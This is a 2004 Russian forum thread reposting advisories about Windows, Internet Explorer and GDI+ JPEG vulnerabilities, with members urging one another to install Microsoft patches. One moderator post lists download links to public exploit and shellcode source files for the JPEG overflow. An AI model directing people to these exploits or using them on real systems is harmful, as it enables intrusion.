Новые уязвимости в Windows NT 4.0/2K/XP/2003, Внимание! Установите себе заплатки! |
Здравствуйте, гость ( Вход | Регистрация )
Новые уязвимости в Windows NT 4.0/2K/XP/2003, Внимание! Установите себе заплатки! |
1.05.2004 - 19:37
Вставить ник | Быстрая цитата | Сообщение
#1
|
|
Энтузиаст Группа: Участник Сообщений: 380 Регистрация: 26.01.2004 Пользователь №: 2024 |
14 новых уязвимостей в Microsoft Windows NT 4.0/2000/XP/2003
]]>http://www.securitylab.ru/44490.html]]> Программа: Windows NT® Workstation 4.0, Windows NT Server 4.0, Windows NT Server 4.0, Terminal Server Edition, Windows 2000, Windows XP, Windows Server™ 2003 Опасность: Критическая Наличие эксплоита: Нет (НУ ПОКА НЕТ! Не дожидайтесь когда появятся вирусы на них)...... Установите себе "заплатки"! Описание: Microsoft опубликовала исправление, которое устраняет 14 недавно обнаруженных уязвимостей в Windows NT 4.0/2000/XP/2003. Удаленный атакующий может получить полный контроль над системой, включая установку программ, просмотр, чтение или удаление данных или создание новых учетных записей. 1. LSASS Vulnerability - CAN-2003-0533: Удаленное переполнение буфера обнаружено в LSASS. Удаленный атакующий может эксплуатировать эту уязвимост, чтобы получить полный контроль над уязвимой системой. 2. LDAP Vulnerability - CAN-2003-0663: Удаленный атакующий может послать специально обработанное LDAP сообщение к контроллеру домена, чтобы заставить сервер прекратить обслуживать аутентифицированных пользователей в Active Directory домене. 3. PCT Vulnerability - CAN-2003-0719: Переполнение буфера обнаружено в Private Communications Transport (PCT) протоколе, который является частью Microsoft Secure Sockets Layer (SSL) библиотеки. Уязвимы только системы, использующие SSL протокол, и в некоторых случаях Windows 2000 контроллер домена. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. 4. Winlogon Vulnerability - CAN-2003-0806: Переполнение буфера обнаружено в Windows logon process (Winlogon). Процесс не проверяет размер значений, используемых в процессе входа в систему. В результате удаленный атакующий может выполнить произвольный код на уязвимой системе. Уязвимы только системы, которые являются членами домена. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. 5. Metafile Vulnerability - CAN-2003-0906: Переполнение буфера обнаружено в обработке Windows Metafile (WMF) и Enhanced Metafile (EMF) форматов изображений, позволяя удаленному атакующему выполнить произвольный код на уязвимой системе. Уязвимы любые программы, обрабатывающие WMF или EMF изображения. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. 6. Help and Support Center Vulnerability - CAN-2003-0907: Уязвимость удаленного выполнения произвольного кода обнаружена в Help and Support Center в пути, которым система обрабатывает HCP URL. Атакующий может сконструировать специально обработанный HCP URL, который выполнить произвольный код на системе пользователя, просматривающего злонамеренную Web страницу или HTML email сообщение. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. 7. Utility Manager Vulnerability - CAN-2003-0908: Уязвимость поднятия привилегий обнаружена в пути, которым Utility Manager запускает приложения. Зарегистрированный пользователь может заставить Utility Manager запустить приложение с SYSTEM привилегиями, чтобы получить полный контроль над уязвимой системой. 8. Windows Management Vulnerability - CAN-2003-0909: Уязвимость поднятия привилегий обнаружена в пути, которым Windows XP позволяет создавать задачи. При некоторых условиях, непривилегированный пользователь может создать задачу, которые будет выполнена с системными привилегиями, чтобы получить полный контроль над уязвимой системой. 9. Local Descriptor Table Vulnerability - CAN-2003-0910: Уязвимость поднятия привилегий обнаружена в программном интерфейсе, который используется для создания записей в Local Descriptor Table (LDT). Эти записи содержат информацию об сегментах памяти. Атакующий, зарегистрированный в системе локально, может создать специально обработанную запись чтобы получить доступ к защищенной памяти, чтобы получить полный контроль над системой. 10. H.323 Vulnerability - CAN-2004-0117: Уязвимость удаленного выполнения произвольного кода обнаружена в пути, которым Microsoft H.323 протокол обрабатывает некорректные запросы. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. 11. Virtual DOS Machine Vulnerability - CAN-2004-0118: Уязвимость поднятия привилегий обнаружена в компоненте операционной системы, которая обрабатывает Virtual DOS Machine (VDM) подсистему. Уязвимость позволяет локальному пользователю получить полный контроль над уязвимой системой. 12. Negotiate SSP Vulnerability - CAN-2004-0119 Переполнение буфера обнаружена в Negotiate Security Software Provider (SSP) интерфейсе. Уязвимость обнаружена в пути, которым Negotiate SSP интерфейс обрабатывает значение, используемое в процессе аутентификации. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. 13. SSL Vulnerability - CAN-2004-0120: Отказ в обслуживании обнаружен в Microsoft Secure Sockets Layer (SSL) библиотеке. Удаленный атакующий может создать специально обработанное SSL сообщение, которое заставить уязвимую систему прекратить обслуживать SSL подключения на Windows 2000 и Windows XP. На Windows Server 2003, система автоматически будет перезагружена. 14.ASN.1 “Double Free” Vulnerability - CAN-2004-0123: Уязвимость, позволяющая удаленно выполнить произвольный код, обнаружена в Microsoft ASN.1 библиотеке. Уязвимость связана с возможностью двойного освобождения памяти в Microsoft ASN.1 Library. . Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. Однако, большинство сценариев нападения приведут к отказу в обслуживании. |
|
|
2.05.2004 - 20:22
Вставить ник | Быстрая цитата | Сообщение
#2
|
|
Энтузиаст Группа: Участник Сообщений: 380 Регистрация: 26.01.2004 Пользователь №: 2024 |
Настоятельно советую внести в свой бюджет статью расходов на безопасность своего ПК, разрешив автоматическое обновление системы. Много трафика он не съест, но зато спать будешь спокойнее!
|
|
|
2.05.2004 - 21:09
Вставить ник | Быстрая цитата | Сообщение
#3
|
|
Светящееся существо Группа: Участник Сообщений: 1150 Регистрация: 29.09.2003 Пользователь №: 80 |
Цитата(YAN @ 2.05.2004 - 20:22) Настоятельно советую внести в свой бюджет статью расходов на безопасность своего ПК, разрешив автоматическое обновление системы. Много трафика он не съест, но зато спать будешь спокойнее! >40Мб если в первый раз учитывая что есть уже сарвис пак(для XP) или стоит уже 3SP (для win2000). |
|
|
2.05.2004 - 21:12
Вставить ник | Быстрая цитата | Сообщение
#4
|
|
Светящееся существо Группа: Участник Сообщений: 1150 Регистрация: 29.09.2003 Пользователь №: 80 |
В новом патче для Windows найдены ошибки
Компания Microsoft признала факт наличия ряда проблем с одним из последних патчей для операционных систем семейства Windows. Как выяснилось, при установке обновления на некоторые компьютеры с ОС Windows 2000, работа может серьезно замедляться, а в ряде случаев пользователи даже не могут войти в систему. Кроме этого, могут наблюдаться зависания компьютера при запуске. Проблема связана с патчем MS-04-014, выпущенным в начале апреля. Он исправляет больше десятка уязвимостей, связанных, в частности, с поддержкой протокола SSL. Проблемы же возникают в случае, если на компьютере установлен клиент виртуальных частных сетей компании Nortel Networks, а компонент IPSec Policy Agent задействован в автоматическом или ручном режиме. Проблемы возникают из-за того, что после установки патча Windows пытается загрузить из интернета несколько драйверов, а именно, Ipsecw2k.sys, Imcide.sys и Dlttape.sys. Однако при загрузке драйверов возникают ошибки, из-за чего и происходит замедление работы и зависание системы. В Microsoft работают над ликвидацией проблемы. В качестве предварительных мер рекомендуется удалить клиент виртуальных частных сетей Nortel и отключить запуск IPSec Policy Agent при начальной загрузке ОС |
|
|
2.05.2004 - 21:14
Вставить ник | Быстрая цитата | Сообщение
#5
|
|
Светящееся существо Группа: Участник Сообщений: 1150 Регистрация: 29.09.2003 Пользователь №: 80 |
Microsoft предупреждает о появлении в Сети кода для реализации атак на ПК с Windows
Во Всемирной сети зафиксировано появление специализированного программного кода, при помощи которого можно организовать атаки на компьютеры, работающие под управлением операционных систем Microsoft Windows 2000, XP, Server 2003 и NT. Эксплойт, получивший название SSL Bomb, использует критическую уязвимость в Windows, заплатка для которой была выпущена софтверным гигантом ровно две недели назад. Проблема связана с локальной подсистемой аутентификации пользователей LSASS (Local Security Authority Subsystem Service), а также протоколом PCT, являющемся частью библиотеки SSL. Ошибки переполнения буфера в этих компонентах позволяют вывести уязвимую машину из строя путем отправки составленных особым образом запросов. Причем дыра в LSASS представляет наибольшую опасность для пользователей операционных систем Windows 2000 и ХР, позволяя хакерам захватить полный контроль над удаленным ПК. Уязвимость в протоколе РСТ является критически важной для ОС Windows 2000 и NT и, кроме того, может применяться при проведении атак на компьютеры с Windows ХР и Server 2003. Правда, в последнем случае протокол РСТ по умолчанию отключен, поэтому организация нападения будет затруднена. Во избежание неприятностей софтверный гигант рекомендует всем пользователям вышеназванных операционных систем как можно скорее установить заплатки, описанные в бюллетене безопасности MS04-011. Данный апдейт ликвидирует дыры в LSASS и SSL, закрывая при этом еще более десяти критически важных уязвимостей. |
|
|
21.05.2004 - 12:10
Вставить ник | Быстрая цитата | Сообщение
#6
|
|
Exterior observer Группа: Участник Сообщений: 919 Регистрация: 30.09.2003 Пользователь №: 133 |
Жмешь windows update конектишься к майкрософту и видишь все обновления, выбираешь например критические обновления и качаешь, они сразу устанавливаются, у меня на ХРени рус порядка 19 мегов обновление заняло.
|
|
|
4.10.2004 - 11:51
Вставить ник | Быстрая цитата | Сообщение
#7
|
|
заЮц гальванический Группа: Участник Сообщений: 973 Регистрация: 19.12.2003 Пользователь №: 1598 |
Провайдер EasyNews зафиксировал появление в интернете первой вредоносной программы, использующей дыру в модуле обработки графических файлов формата JPEG, входящем в состав различных продуктов Microsoft.
О наличии данной уязвимости софтверный гигант сообщил в середине сентября. Проблема затрагивает чрезвычайно широкий спектр программных пакетов, включая операционные системы Windows, офисные приложения и пр. Более того, по заявлениям известного хакера Тома Листона, опубликовавшего открытое письмо на сайте Internet Storm Center (ISC), уязвимая библиотека входит в состав и многих других продуктов, созданных сторонними компаниями и независимыми разработчиками. Первый эксплойт для JPEG-дыры был обнаружен на прошлой неделе. Правда, вредоносный код носил чисто демонстрационный характер и мог спровоцировать лишь зависание компьютера в результате ошибки переполнения буфера. Позднее стало известно о появлении еще одного, намного более опасного эксплойта, способного запускать командную строку Windows. Тогда же эксперты по вопросам сетевой безопасности сделали предположение, что эра JPEG-вирусов уже не за горами. Как теперь выяснилось, опасения специалистов были не напрасными. По информации EasyNews, обнаруженный вредоносный код представляет собой JPEG-файл размером около 10 кб, распространяемый в USENET-конференциях. При попытке просмотра этого файла любым из уязвимых приложений возникает ошибка переполнения буфера, после чего вирус соединяется с неким FTP-сервером и загружает с него утилиту удаленного управления RAdmin. Таким образом, злоумышленники теоретически могут получить несанкционированный доступ к пораженной машине. Вполне вероятно, вредоносная программа выполняет и какие-то другие действия, однако это станет известно только после детального анализа кода вируса. ЗЫ: поэтому не открывайте картинки от незнакомых людей Сообщение отредактировано NAT - 4.10.2004 - 11:56 |
|
|
11.10.2004 - 11:48
Вставить ник | Быстрая цитата | Сообщение
#8
|
|
заЮц гальванический Группа: Участник Сообщений: 973 Регистрация: 19.12.2003 Пользователь №: 1598 |
балинннн...
]]>http://km.ru/magazin/view.asp?id=ea0793219...81f28f76c587d57]]> Первая демонстрационная программа, основанная на коде, с помощью которого вирусы смогут заражать графические файлы, на днях появилась в интернете. Специалисты по сетевой безопасности предрекают — новая вирусная эпидемия уже не за горами. Уязвимость заключается в том, каким образом программы Microsoft обрабатывают файлы самого популярного графического формата — JPEG. Источник неприятностей — механизм GDI+ (Graphics Device Interface Plus), с помощью которого и происходит обработка графики в приложениях. В число уязвимых программ входят: Microsoft Windows XP, Windows Server 2003, Office XP, Office 2003, Internet Explorer 6 (включая Service Pack 1), Project, Visio, Picture It и Digital Image Pro. Особую опасность представляет Internet Explorer. Это значит, чтобы подцепить вирус, достаточно просто зайти на какой-нибудь сайт с «зараженными» рисунками или фотографиями. Посещая проверенные и уважаемые сайты можно быть относительно уверенным в безопасности своего компьютера, но сайты эротического содержания — прямая угроза. Подсунуть туда зараженные фотографии злоумышленникам труда не составит. А если зараженный баннер пролезет в популярные баннерообменные сети — эпидемия может захлестнуть весь Интернет за считанные дни. Вот что говорит Винсент Вифер, директор Подразделения компьютерной безопасности компании Symantec, производящей антивирусное программное обеспечение: «Уже в ближайшие дни появятся вирусы, использующие эту уязвимость. Ситуация особенно опасна, потому что JPEG сейчас используется абсолютно везде». На доске объявлений сайта Microsoft уже лежит краткое описание проблемы и «заплатки» для Windows и Office, которые можно скачать. Там же можно проверить свой компьютер с помощью онлайн-скрипта на наличие на вашем компьютере остальных уязвимых программ. Этой дыре в безопасности присвоен высший рейтинг — «критическая». Если вы еще не установили себе Windows XP Service Pack 2, защитите свой компьютер хотя бы так. |
|
|
11.10.2004 - 13:38
Вставить ник | Быстрая цитата | Сообщение
#9
|
|
заЮц гальванический Группа: Участник Сообщений: 973 Регистрация: 19.12.2003 Пользователь №: 1598 |
]]>http://www.microsoft.com/security/bulletins/200409_jpeg.mspx]]>
по этой ссылке майкрософта можно скачать заплатки для винды и офиса, а также пройти он-лайн тестирование на уязвимость (что там есть еще, см. статью выше. |
|
|
12.10.2004 - 08:36
Вставить ник | Быстрая цитата | Сообщение
#10
|
|
#!/usr/bin/neolite Группа: Модератор Сообщений: 1728 Регистрация: 11.11.2003 Пользователь №: 887 |
1. Переполнение буфера при разборе JPEG в библиотеках GDI+ Windows
(buffer overflow), дополнено с 15 сентября 2004 г. Опубликовано: 11 октября 2004 г. Источник: MICROSOFT Тип: библиотека Опасность: 8 Описание: Переполнение буфера в функциях разбора JPEG формата. Продукты: BUSYNESSOBJECTS: Crystal Reports 10 MICROSOFT: Windows XP MICROSOFT: Windows 2003 Server MICROSOFT: Office XP MICROSOFT: Office 2003 MICROSOFT: Project 2002 MICROSOFT: Project 2003 MICROSOFT: Visio 2002 MICROSOFT: Visio 2003 MICROSOFT: Visual Studio .NET 2002 MICROSOFT: Visual Studio .NET 2003 MICROSOFT: .NET Framework version 1.0 SDK MICROSOFT: Greetings 2002 MICROSOFT: Picture It! 7.0 MICROSOFT: Digital Image Pro 7.0 MICROSOFT: Digital Image Pro 9 MICROSOFT: Picture It! 9 MICROSOFT: Digital Image Suite 9 MICROSOFT: GDI+ MICROSOFT: Internet Explorer 6.0 MICROSOFT: NET Framework 1.0 MICROSOFT: NET Framework 1.1 Документы: Nick D., Microsoft GDIPlus.DLL JPEG Parsing Engine Buffer Overflow, ]]>http://www.security.nnov.ru/search/document.asp?docid=6810]]> MICROSOFT: Microsoft Security Bulletin MS04-028 Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987), ]]>http://www.security.nnov.ru/search/document.asp?docid=6804]]> CERT: US-CERT Technical Cyber Security Alert TA04-260A -- Microsoft Windows JPEG component buffer overflow, ]]>http://www.security.nnov.ru/search/document.asp?docid=6825]]> SECUNIA: [SA12772] Crystal Reports JPEG Processing Buffer Overflow Vulnerability, ]]>http://www.security.nnov.ru/search/document.asp?docid=6968]]> Файлы: Windows XP JPEG Buffer Overflow POC , ]]>http://www.security.nnov.ru/files/jpegcompoc.zip]]> Example of JPG Exploit & Shellcode, ]]>http://www.security.nnov.ru/files/CAN-2004-0200.c]]> GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru>, ]]>http://www.security.nnov.ru/files/sacred_jpg.c]]> GDIPLUS VULN - MS04-028 - CRASH TEST JPEG, ]]>http://www.security.nnov.ru/files/CRASH-TEST.zip]]> GDI+ JPEG Remote Exploit, ]]>http://www.security.nnov.ru/files/JpegOfDeath.c]]> Microsoft Security Bulletin MS04-028 Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987), ]]>http://www.microsoft.com/technet/security/...n/MS04-028.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4004]]> |
|
|
13.10.2004 - 20:49
Вставить ник | Быстрая цитата | Сообщение
#11
|
|
#!/usr/bin/neolite Группа: Модератор Сообщений: 1728 Регистрация: 11.11.2003 Пользователь №: 887 |
13 октября 2004
Удаленный отказ в обслуживании в Microsoft Windows NT/2000/XP Программа: Microsoft Windows NT Server 4.0 Service Pack 6a , Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6, Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4, Microsoft Windows XP and Microsoft Windows XP Service Pack 1, Microsoft Windows XP 64-Bit Edition Service Pack 1, Microsoft Windows XP 64-Bit Edition Version 2003, Microsoft Windows Server 2003, Microsoft Windows Server 2003 64-Bit Edition Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Microsoft Windows NT/2000/XP. Удаленный пользователь может вызвать отказ в обслуживании или получить полный контроль над уязвимой системой. Переполнение буфера обнаружено в NetDDE службе. Уязвимость позволяет удаленному атакующему выполнить произвольный код на уязвимой системе с SYSTEM привилегиями. Служба NetDDE отключена по умолчанию. URL производителя: ]]>Microsoft.com]]> Решение:Установите соответствующее обновление: • Microsoft Windows NT Server 4.0 Service Pack 6a – ]]>Download the update]]> • Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 – ]]>Download the update]]> •Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 – ]]>Download the update]]> •Microsoft Windows XP and Microsoft Windows XP Service Pack 1 – ]]>Download the update]]> •Microsoft Windows XP 64-Bit Edition Service Pack 1 – ]]>Download the update]]> •Microsoft Windows XP 64-Bit Edition Version 2003 – ]]>Download the update]]> •Microsoft Windows Server 2003 – ]]>Download the update]]> •Microsoft Windows Server 2003 64-Bit Edition – ]]>Download the update]]> Другие публикации: ]]>MS04-031:Vulnerability in NetDDE Could Allow Remote Code Execution (841533)]]> Neolite добавил(а) в нет данных 13 октября 2004 Восемь уязвимостей в Microsoft Internet Explorer Программа: Microsoft Internet Explorer 5.01-6.0 Опасность: Критическая Наличие эксплоита: Нет Описание: Восемь уязвимостей обнаружено в Microsoft Internet Explorer. Злонамеренный пользователь может получить полный контроль над уязвимой системой, подменить URL в адресной строке и выполнить код в контексте защищенного Web сайта. CSS Heap Memory Corruption Vulnerability - CAN-2004-0842: Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы выполнить произвольный код на системе целевого пользователя, просмотревшего эту страницу. 2. Similar Method Name Redirection Cross Domain Vulnerability - CAN-2004-0727: Уязвимость обнаружена в обработке методов навигации функциями, которые имеют похожие названия. Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы выполнить произвольный код сценария в Local Machine security zone в Internet Explorer или получить доступ к информации в другом домене. 3. Install Engine Vulnerability - CAN-2004-0216: Уязвимость в Inseng.dll позволяет удаленному атакующему выполнить произвольный код на уязвимой системе. 4. Drag and Drop Vulnerability - CAN-2004-0839: Уязвимость обнаружена в обработке Drag and Drop событий. Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы записать файл на систему целевого пользователя, посетившего Web страницу или прочитавшего злонамеренное e-mail сообщение. 5. Address Bar Spoofing on Double Byte Character Set Systems Vulnerability - CAN-2004-0844: Уязвимость обнаружена в обработке URL на Double Byte Character Set системах. В результате можно представить произвольный URL в адресной строке, отличный от URL загружаемой страницы. 6. Plug-in Navigation Address Bar Spoofing Vulnerability - CAN-2004-0843: Уязвимость обнаружен в обработке Plug-in навигации. В результате можно представить произвольный URL в адресной строке, отличный от URL загружаемой страницы. 7. Script in Image Tag File Download Vulnerability - CAN-2004-0841: Уязвимость обнаружен в пути, которым Internet Explorer обрабатывает сценарии в image тэгах. Удаленный атакующий может сконструировать злонамеренную Web страницу, которая запишет файл на систему целевого пользователя, посетившего злонамеренный Web сайт или просмотревшего злонамеренное email сообщение. В результате удаленный атакующий может получить полный контроль над уязвимой системой. 8. SSL Caching Vulnerability - CAN-2004-0845: Уязвимость обнаружена в пути, которым Internet Explorer подтверждает кэшированное содержание SSL Web сайтов. Удаленный атакующий может запустить произвольный сценарий на защищенном Web сайте. URL производителя: ]]>http://www.Microsoft.com]]> Решение: Установите соответствующее обновление: Internet Explorer 5.01 Service Pack 3 on Windows 2000 SP3: Download the update. Internet Explorer 5.01 Service Pack 4 on Windows 2000 SP4: Download the update. Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Me: Download the update. Internet Explorer 6 on Windows XP: Download the update. Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3, on Microsoft Windows 2000 Service Pack 4, on Microsoft Windows XP, or on Microsoft Windows XP Service Pack 1: Download the update. Internet Explorer 6 Service Pack 1 on Microsoft Windows NT Server 4.0 Service Pack 6a, on Microsoft Windows NT Server 4.0 Terminal Service Edition Service Pack 6, on Microsoft Windows 98, on Microsoft Windows 98 SE, or on Microsoft Windows Me: Download the update. Internet Explorer 6 for Windows XP Service Pack 1 (64-Bit Edition): Download the update. Internet Explorer 6 for Windows Server 2003: Download the update. Internet Explorer 6 for Windows Server 2003 64-Bit Edition and Windows XP 64-Bit Edition Version 2003: Download the update. Internet Explorer 6 for Windows XP Service Pack 2: Download the update. Neolite добавил(а) в нет данных 13 октября 2004 Две уязвимости в различных версиях Microsoft Windows Программа: Microsoft Windows NT Server 4.0 Service Pack 6a , Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6, Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4, Microsoft Windows XP and Microsoft Windows XP Service Pack 1, Microsoft Windows XP 64-Bit Edition Service Pack 1, Microsoft Windows XP 64-Bit Edition Version 2003, Microsoft Windows Server 2003, Microsoft Windows Server 2003 64-Bit Edition, Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), Microsoft Windows Millennium Edition (ME) Опасность: Критическая Наличие эксплоита: Нет Описание: Две уязвимости обнаружено в различных версиях Microsoft Windows. Удаленный атакующий может выполнить произвольный код на уязвимой системе. 1. Уязвимость обнаружена в пути, которым Windows Shell запускает приложения. Удаленный атакующий может сконструировать специально обработанный Web сайт, чтобы выполнить произвольный код на системе целевого пользователя, посетившего этот сайт. 2. Уязвимость обнаружена в обработке специально обработанных запросов в Program Group Converter. Атакующий может сконструировать специально обработанный запрос, чтобы выполнить произвольный код на системе целевого пользователя, выполняющего некоторые действия, типа открытия прикрепленного файла или клика на html ссылку. URL производителя: Microsoft.com Решение:Установите соответствующее обновление: Microsoft Windows NT Server 4.0 Service Pack 6a – Download the update Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 – Download the update Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 – Download the update Microsoft Windows XP and Microsoft Windows XP Service Pack 1 – Download the update Microsoft Windows XP 64-Bit Edition Service Pack 1 – Download the update Microsoft Windows XP 64-Bit Edition Version 2003 – Download the update Microsoft Windows Server 2003 – Download the update Microsoft Windows Server 2003 64-Bit Edition – Download the update Другие публикации: MS04-037:Vulnerability in Windows Shell Could Allow Remote Code Execution (841356) Neolite добавил(а) в нет данных 13 октября 2004 Удаленное выполнение произвольного кода в Microsoft Windows XP/2003 Программа: Microsoft Windows XP and Microsoft Windows XP Service Pack 1, Microsoft Windows XP 64-Bit Edition Service Pack 1, Microsoft Windows XP 64-Bit Edition Version 2003, Microsoft Windows Server 2003, Microsoft Windows Server 2003 64-Bit Edition Опасность: Критическая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Microsoft Windows XP/2003. Удаленный атакующий может выполнить произвольный код на целевой системе. Переполнение буфера обнаружено в Сжатых (zipped) Папках при обработке специально сформированных сжатых файлов. Удаленный атакующий может сконструировать специально обработанный сжатый файл, чтобы выполнить произвольный код на системе пользователя, посетившего злонамеренный Web сайт. URL производителя:http://www.Microsoft.com Решение:Установите соответствующее обновление: Microsoft Windows XP and Microsoft Windows XP Service Pack 1 – Download the update Microsoft Windows XP 64-Bit Edition Service Pack 1 – Download the update Microsoft Windows XP 64-Bit Edition Version 2003 – Download the update Microsoft Windows Server 2003 – Download the update Microsoft Windows Server 2003 64-Bit Edition – Download the update Другие публикации: MS04-034:Vulnerability in Compressed (zipped) Folders Could Allow Remote Code Execution (873376) Слишком много уязвимостей!!! Полный список смотрите на ]]>http://www.securitylab.ru/]]>! Сообщение отредактировано Neolite - 13.10.2004 - 20:56 |
|
|
13.10.2004 - 21:18
Вставить ник | Быстрая цитата | Сообщение
#12
|
|
#!/usr/bin/neolite Группа: Модератор Сообщений: 1728 Регистрация: 11.11.2003 Пользователь №: 887 |
Новости 13 октября 2004 г.:
1. Многочисленные ошибки в Microsoft Internet Explorer (multiple bugs) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: клиент Опасность: 9 Описание: переполнение буфера при обработке CSS, Скриптинг в локальной зоне, переполнение буфера в Install Engine, запись файла в известное расположение через перетаскивание или скриптинг в таге <img>, подмена адреса, межсайтовый скриптинг в SSL. Продукты: MICROSOFT: Internet Explorer 5.5 MICROSOFT: Internet Explorer 6.0 Документы: MICROSOFT: Microsoft Security Bulletin MS04-038 Cumulative Security Update for Internet Explorer (834707), ]]>http://www.security.nnov.ru/search/document.asp?docid=6983]]> NGSSoftware Insight Security Research Advisory (NISR), Microsoft Internet Explorer Install Engine Control Buffer Overflow, ]]>http://www.security.nnov.ru/search/document.asp?docid=6985]]> ACROS Security, ACROS Security: Poisoning Cached HTTPS Documents in Internet Explorer, ]]>http://www.security.nnov.ru/search/document.asp?docid=6991]]> Файлы: Microsoft Security Bulletin MS04-038 Cumulative Security Update for Internet Explorer (834707), ]]>http://www.microsoft.com/technet/security/...n/MS04-038.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4091]]> 2. Выполнение кода через Microsoft NNTP (code execution) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: удаленная Опасность: 8 Описание: Многочисленные ошибки при разборе команды XPAT. Продукты: MICROSOFT: Windows NT 4.0 Server MICROSOFT: Windows 2000 Server MICROSOFT: Windows 2003 Server MICROSOFT: Exchange 2000 MICROSOFT: Exchange 2003 Документы: MICROSOFT: Microsoft Security Bulletin MS04-036 Vulnerability in NNTP Could Allow Remote Code Execution (883935), ]]>http://www.security.nnov.ru/search/document.asp?docid=6981]]> CORE SECURITY TECHNOLOGIES ADVISORIES, CORE-2004-0802: IIS NNTP Service XPAT Command Vulnerabilities, ]]>http://www.security.nnov.ru/search/document.asp?docid=6986]]> Файлы: Microsoft Security Bulletin MS04-036 Vulnerability in NNTP Could Allow Remote Code Execution (883935), ]]>http://www.microsoft.com/technet/security/...n/MS04-036.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4089]]> 3. Многочисленные ошибки в Microsoft Windows (multiple bugs) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: клиент Опасность: 8 Описание: Повышение привилегией через API управления окнами, виртуальную DOS-машину, выполнение кода через EMF/WMF файлы, DoS. Продукты: MICROSOFT: Windows NT 4.0 Server MICROSOFT: Windows 2000 Server MICROSOFT: Windows 2000 Professional MICROSOFT: Windows XP MICROSOFT: Windows 2003 Server Документы: MICROSOFT: Microsoft Security Bulletin MS04-032 Security Update for Microsoft Windows (840987), ]]>http://www.security.nnov.ru/search/document.asp?docid=6977]]> EEYE: [Full-Disclosure] EEYE: Windows VDM #UD Local Privilege Escalation, ]]>http://www.security.nnov.ru/search/document.asp?docid=6990]]> Файлы: Microsoft Security Bulletin MS04-032 Security Update for Microsoft Windows (840987), ]]>http://www.microsoft.com/technet/security/...n/MS04-032.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4085]]> 4. Переполнение буфера в Windows Shell (buffer overflow) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: удаленная Опасность: 6 Продукты: MICROSOFT: Windows NT 4.0 Server MICROSOFT: Windows 2000 Server MICROSOFT: Windows 2000 Professional MICROSOFT: Windows XP MICROSOFT: Windows 2003 Server Документы: MICROSOFT: Microsoft Security Bulletin MS04-037 Vulnerability in Windows Shell Could Allow Remote Code Execution (841356), ]]>http://www.security.nnov.ru/search/document.asp?docid=6982]]> Файлы: Microsoft Security Bulletin MS04-037 Vulnerability in Windows Shell Could Allow Remote Code Execution (841356), ]]>http://www.microsoft.com/technet/security/...n/MS04-037.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4090]]> 5. Переполнение буфера в службе Windows SMTP (buffer overflow) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: удаленная Опасность: 6 Описание: Переполнение буфера при анализе DNS ответа сконфигурированного сервера. Продукты: MICROSOFT: Windows 2003 Server MICROSOFT: Exchange 2003 Документы: MICROSOFT: Microsoft Security Bulletin MS04-035 Vulnerability in SMTP Could Allow Remote Code Execution (885881), ]]>http://www.security.nnov.ru/search/document.asp?docid=6980]]> Файлы: Microsoft Security Bulletin MS04-035 Vulnerability in SMTP Could Allow Remote Code Execution (885881), ]]>http://www.microsoft.com/technet/security/...n/MS04-035.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4088]]> 6. DoS через XML в Microsoft WebDAV Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: удаленная Опасность: 6 Описание: Большое количество аттрибутов в запросе приводит к исчерпанию ресурсов. Продукты: MICROSOFT: Internet Information Server 5.0 MICROSOFT: Internet Information Server 5.1 MICROSOFT: Internet Information Server 6.0 Документы: MICROSOFT: Microsoft Security Bulletin MS04-030 Vulnerability in WebDAV XML Message Handler Could Lead to a Denial of Service (824151), ]]>http://www.security.nnov.ru/search/document.asp?docid=6975]]> Amit Klein (AKsecurity), Microsoft IIS 5.x/6.0 WebDAV (XML parser) attribute blowup DoS, ]]>http://www.security.nnov.ru/search/document.asp?docid=6987]]> Файлы: Microsoft Security Bulletin MS04-030 Vulnerability in WebDAV XML Message Handler Could Lead to a Denial of Service (824151), ]]>http://www.microsoft.com/technet/security/...n/MS04-030.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4083]]> 7. Многочисленные ошибки в Internet Explorer (multiple bugs), дополнено с 23 августа 2002 г. Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: удаленная Опасность: 6 Описание: Вышел очередной 